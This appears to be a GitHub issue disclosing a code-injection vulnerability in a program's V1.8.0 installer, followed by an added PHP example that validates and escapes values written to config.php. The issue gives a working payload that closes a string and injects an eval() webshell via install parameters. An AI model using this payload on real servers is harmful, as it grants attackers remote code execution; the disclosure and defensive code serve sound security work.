There are vulnerabilities in the program installation, which can cause hackers to obtain server permissions
ch0x01e opened this issue
There are vulnerabilities in program V1.8.0
The vulnerability is located in the image below
The loophole is in these two parameters, which can be written directly to the Webshell at installation time by constructing a specific payload
payload: test.com');eval($_POST['a']);//
After the payload is written, a config.php file is automatically generated. The parentheses close and the webshell can be accessed
The following figure shows the webshell result
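
Added example, not part of the original issue or the project's code: one way an installer can write user-supplied values into config.php so that a quote or parenthesis in the input cannot end the string literal. The setting name `site_domain` and the helper functions are hypothetical, and the vulnerable pattern in the comment is an assumption about how the value reaches the file.

```php
<?php
declare(strict_types=1);

// Added example. Names (site_domain, validate_hostname, render_config) are
// hypothetical; the installer's real code is not shown on this page.
//
// Assumed vulnerable pattern, for contrast: the value is concatenated into a
// single-quoted PHP literal, so a quote in the input ends the literal early.
//   $php = "<?php\n\$config['site_domain'] = '" . $_POST['site_domain'] . "';\n";

/** Accept only a syntactically valid hostname; reject everything else. */
function validate_hostname(string $value): string
{
    $value = trim($value);
    if (filter_var($value, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) === false) {
        throw new InvalidArgumentException('invalid hostname');
    }
    return $value;
}

/** Render settings as PHP source; var_export() escapes quotes and backslashes. */
function render_config(array $settings): string
{
    return "<?php\nreturn " . var_export($settings, true) . ";\n";
}

// Constructed sample inputs: one normal value, one containing a quote and ')'.
$samples = ['test.com', "test.com');//"];

foreach ($samples as $input) {
    try {
        $host = validate_hostname($input);
        echo "accepted: {$host}\n", render_config(['site_domain' => $host]);
    } catch (InvalidArgumentException $e) {
        echo "rejected: ", var_export($input, true), "\n";
    }
}

// Even if validation were skipped, the quote stays inside the string literal:
echo render_config(['site_domain' => $samples[1]]);
```

Validation and escaping are independent layers here: the hostname check rejects the second sample outright, and `var_export()` keeps it inert as data if it is ever written anyway.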